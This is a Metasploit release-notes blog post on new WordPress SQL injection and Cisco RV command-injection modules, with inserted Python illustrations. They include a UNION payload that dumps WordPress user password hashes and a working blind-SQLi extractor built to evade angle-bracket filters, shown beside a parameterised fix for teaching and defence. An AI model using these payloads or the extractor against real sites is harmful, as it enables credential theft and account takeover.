Metasploit Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/02/04/metasploit-wrap-up-147/

WordPress Exploitation Returns


What’s life without a little WordPress exploitation? Courtesy of Hacker5preme (aka Ron Jost) and h00die, we now have an exploit for CVE-2021-24862, an SQL injection in the RegistrationMagic WordPress plugin prior to version 5.0.1.6, where user input supplied to the rm_chronos_ajax action was not properly escaped before being used in an SQL statement.

Using this module, authenticated attackers can dump the usernames and password hashes of users on the affected WordPress site; the hashes can then be cracked offline with hashcat or John the Ripper to recover the plaintext passwords.

Since users tend to reuse passwords across sites, a cracked password could allow an attacker to log into other sites as the same user, a practice commonly known as credential stuffing. As a reminder, use a unique password for each site to mitigate credential stuffing attacks.

While the risk is somewhat mitigated by the fact that valid login credentials are required, keep in mind that RegistrationMagic is a user registration form plugin whose purpose is to register users onto your WordPress site, so in most cases all an attacker has to do is register an account on the target site to exploit this bug.
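To make the bug class concrete, here is an added illustration that is not the plugin's code or the Metasploit module's: a hypothetical AJAX handler that concatenates a comma-separated task_ids parameter straight into an IN clause, beside a version that validates the input and binds it as query parameters. An in-memory SQLite database with a constructed wp_users table stands in for the WordPress MySQL database, and the hash value is a placeholder; in real plugin code the equivalent fix is $wpdb->prepare() with placeholders instead of string interpolation.

```python
import sqlite3


def make_db():
    """Constructed stand-in for a WordPress database: a wp_users table plus a
    plugin table that the AJAX action queries. The hash is a placeholder."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT)")
    db.execute("INSERT INTO wp_users VALUES (1, 'admin', '$P$BConstructedAdminHash')")
    db.execute("CREATE TABLE plugin_tasks (id INTEGER, name TEXT)")
    db.executemany("INSERT INTO plugin_tasks VALUES (?, ?)",
                   [(1, "welcome mail"), (2, "cleanup")])
    return db


def vulnerable_handler(db, task_ids):
    """Hypothetical AJAX handler: the request parameter is interpolated into the
    SQL text unescaped, the class of bug described above (not the plugin's code)."""
    sql = f"SELECT id, name FROM plugin_tasks WHERE id IN ({task_ids})"
    return db.execute(sql).fetchall()


def hardened_handler(db, task_ids):
    """Same lookup with the input validated as integers and bound as parameters,
    so the values can never change the structure of the query."""
    ids = [int(x) for x in task_ids.split(",")]  # ValueError on anything non-numeric
    placeholders = ",".join("?" * len(ids))
    sql = f"SELECT id, name FROM plugin_tasks WHERE id IN ({placeholders})"
    return db.execute(sql, ids).fetchall()


# A payload an authenticated attacker could send: close the IN list, UNION in
# every user's login and password hash, and comment out the rest of the query.
PAYLOAD = "1) UNION SELECT user_login, user_pass FROM wp_users--"


def demo():
    """Returns (rows leaked by the vulnerable handler, whether the hardened
    handler rejected the same payload)."""
    db = make_db()
    leaked = vulnerable_handler(db, PAYLOAD)
    try:
        hardened_handler(db, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked


if __name__ == "__main__":
    rows, blocked = demo()
    print("leaked:", rows)
    print("hardened handler rejected payload:", blocked)
```

The leaked rows contain the admin login and hash alongside the legitimate task rows, which is exactly the data the module retrieves; the hardened handler never reaches the database because the integer validation fails first, and even a numeric-looking payload would only ever be compared as a bound value.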

Unauthenticated Cisco Small Business RV Series Command Injection – Cisco Spiciness Returns

It’s always good when we get a Cisco module, as these devices are used all over the place. Takeshi Shiomitsu and Rapid7’s Jacob Baines certainly delivered on this front with a module for CVE-2021-1473, which chains an authentication bypass with a command injection vulnerability to execute code as the www-data user on vulnerable Cisco RV Series VPNs and routers running firmware versions 1.0.03.20 and below.

Because of the sensitivity of the data that Cisco routers process, as well as the level of network access they often have, Cisco routers have frequently been a prime target for exploitation. In-the-wild exploitation of this vulnerability is likely in the near future, so if you haven’t patched it already, you are strongly encouraged to do so soon.

New module content (3)

Enhancements and features

  • #15994 from timwr – This updates Metasploit’s RPC functionality to support reading the results of external commands that have been executed in a console.
  • #16014 from sjanusz-r7 – This adds human readable long-form option names to various commands such as save/connect/search and more.
  • #16112 from zeroSteiner – This updates the PHP Meterpreter’s delete dir functionality to recursively delete directories, and adds validation to the getsystem command on Windows Meterpreter.
  • #16113 from bcoles – A new NOP module, modules/nop/cmd/generic, has been added which supports adding NOPs to command line payloads using spaces for NOP characters.
  • #16132 from red0xff – Enhancement to the MySQL injection library: the blind injection techniques now avoid the < and > characters to improve compatibility.
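As an added illustration of why angle brackets matter for blind injection (this is not the Metasploit library's own code, and the library's exact rewrite is not shown here), the following Python recovers a password hash one character at a time through a boolean oracle, expressing every comparison with BETWEEN so the generated payloads contain no < or > at all. The database, the wp_users table and the hash are constructed; the oracle class stands in for the vulnerable page's true/false response, and the ord_fn name is unicode for SQLite where MySQL would use ASCII() or ORD().

```python
import sqlite3


def make_db():
    """Constructed stand-in for a wp_users table; the hash is a placeholder."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_users (user_login TEXT, user_pass TEXT)")
    db.execute("INSERT INTO wp_users VALUES ('admin', '$P$BConstructedAdminHash')")
    return db


class BlindOracle:
    """Plays the part of the vulnerable application: the attacker controls only
    the condition ANDed into the WHERE clause and learns one bit per request
    (a row came back, or it did not)."""

    def __init__(self, db):
        self.db = db
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        sql = f"SELECT 1 FROM wp_users WHERE user_login='admin' AND ({condition})"
        return self.db.execute(sql).fetchone() is not None


def in_range_cond(expr, pos, lo, hi, ord_fn="unicode"):
    """Condition that holds when the character code at 1-based position pos of
    expr lies in [lo, hi]. BETWEEN replaces the usual '<'/'>' comparison, so the
    payload survives filters and encoders that mangle angle brackets.
    ord_fn is 'unicode' for SQLite; MySQL would use ASCII() or ORD()."""
    return f"{ord_fn}(substr(({expr}),{pos},1)) BETWEEN {lo} AND {hi}"


def extract(oracle, expr, max_len=64):
    """Recover the string value of expr by binary search over the byte range,
    roughly 8 requests per character plus one to detect the end."""
    out = []
    for pos in range(1, max_len + 1):
        # Past the end of the string substr() yields '' and the ord function
        # yields NULL, so the range test is false and we stop.
        if not oracle.ask(in_range_cond(expr, pos, 1, 255)):
            break
        lo, hi = 1, 255  # invariant: the character code lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.ask(in_range_cond(expr, pos, mid + 1, hi)):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def demo():
    """Returns (extracted hash, number of oracle requests used)."""
    oracle = BlindOracle(make_db())
    value = extract(oracle, "SELECT user_pass FROM wp_users WHERE user_login='admin'")
    return value, oracle.requests


if __name__ == "__main__":
    hash_value, n = demo()
    print(f"recovered {hash_value!r} in {n} requests")
```

Against a real target the oracle's ask() would issue an HTTP request and compare the response to a known true and false baseline; everything else, including the absence of angle brackets in the payload, stays the same.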

Bugs fixed

  • #16025 from 3V3RYONE – This fixes an issue with msfdb init on Windows when opting not to initialize web services.
  • #16066 from sjanusz-r7 – This fixes a bug where Meterpreter scripts did not correctly receive arguments as part of the sessions command. Note that Meterpreter scripts are deprecated and have been replaced with Post modules.
  • #16109 from bcoles – This fixes a crash in post/windows/gather/enum_domains when no domains are found.
  • #16114 from bcoles – A bug existed in PayloadGenerator::prepend_nops whereby, if no NOP modules existed for the target payload architecture, the payload was discarded and replaced with the string form of an array of NOP modules. This has been fixed: if no NOP modules exist for the target payload architecture, the raw shellcode is now returned unmodified.
  • #16119 from mrshu – This change fixes an incorrect user-agent in modules/auxiliary/dos/http/slowloris.py.
  • #16123 from AtmegaBuzz – This fixes the missing full disclosure reference URL in the exploit/linux/http/cisco_ucs_rce module.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).